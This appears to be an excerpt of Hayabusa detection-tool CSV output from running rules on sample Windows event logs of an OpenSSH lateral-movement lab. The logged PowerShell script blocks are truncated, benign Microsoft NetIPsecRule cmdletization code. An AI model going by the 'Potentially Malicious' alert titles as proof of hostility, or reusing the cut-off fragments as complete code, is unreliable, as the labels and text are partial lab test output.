[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) 
$__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) 
$__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
